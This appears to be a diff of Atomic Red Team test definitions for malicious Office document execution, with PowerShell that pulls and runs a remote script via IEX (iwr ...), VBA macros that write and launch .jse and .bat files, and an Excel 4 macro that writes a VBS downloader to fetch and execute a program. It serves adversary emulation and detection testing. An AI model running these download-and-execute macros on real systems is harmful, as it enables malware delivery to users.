| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -46,31 +47,31 @@ References:
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -127,7 +128,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | String | Word|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -135,30 +135,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -181,7 +178,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | Path | C:&#92;Users&#92;Public&#92;art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)|
#### Attack Commands: Run with `powershell`!
@@ -189,31 +185,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
$ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -233,8 +225,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bat_path | Path to malicious .bat file | String | $env:temp+"&#92;art1204.bat"|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | string | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
| bat_path | Path to malicious .bat file | String | $("$env:temp&#92;art1204.bat")|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -243,32 +234,135 @@ Microsoft Office creating then launching a .bat script from an AppData directory
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$bat_path = #{bat_path}
$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
```
#### Cleanup Commands:
```powershell
$ms_office_version = #{ms_office_version}
if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
<br/>
<br/>
## Atomic Test #6 - Excel 4 Macro
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| download_url | Download URL | String | https://live.sysinternals.com/procexp.exe|
| uname | Username for pathing | String | $env:Username|
#### Attack Commands: Run with `powershell`!
```powershell
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp
```
#### Cleanup Commands:
```powershell
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Excel must be installed
##### Check Prereq Commands:
```powershell
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
```
atomics/T1204.002/T1204.002.yaml
+1 -1
View File
@@ -165,7 +165,7 @@ atomic_tests:
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
- name: Excel 4 Macro
auto_generated_guid:
auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
atomics/T1566.001/T1566.001.md
+10 -8
View File
@@ -63,7 +63,6 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
#### Attack Commands: Run with `powershell`!
@@ -72,27 +71,30 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependent registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
atomics/used_guids.txt
+2
View File
@@ -625,3 +625,5 @@ f38e9eea-e1d7-4ba6-b716-584791963827
60e860b6-8ae6-49db-ad07-5e73edd88f5d
9215ea92-1ded-41b7-9cd6-79f9a78397aa
9a2915b3-3954-4cce-8c76-00fbf4dbd014
e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
4ea1fc97-8a46-4b4e-ba48-af43d2a98052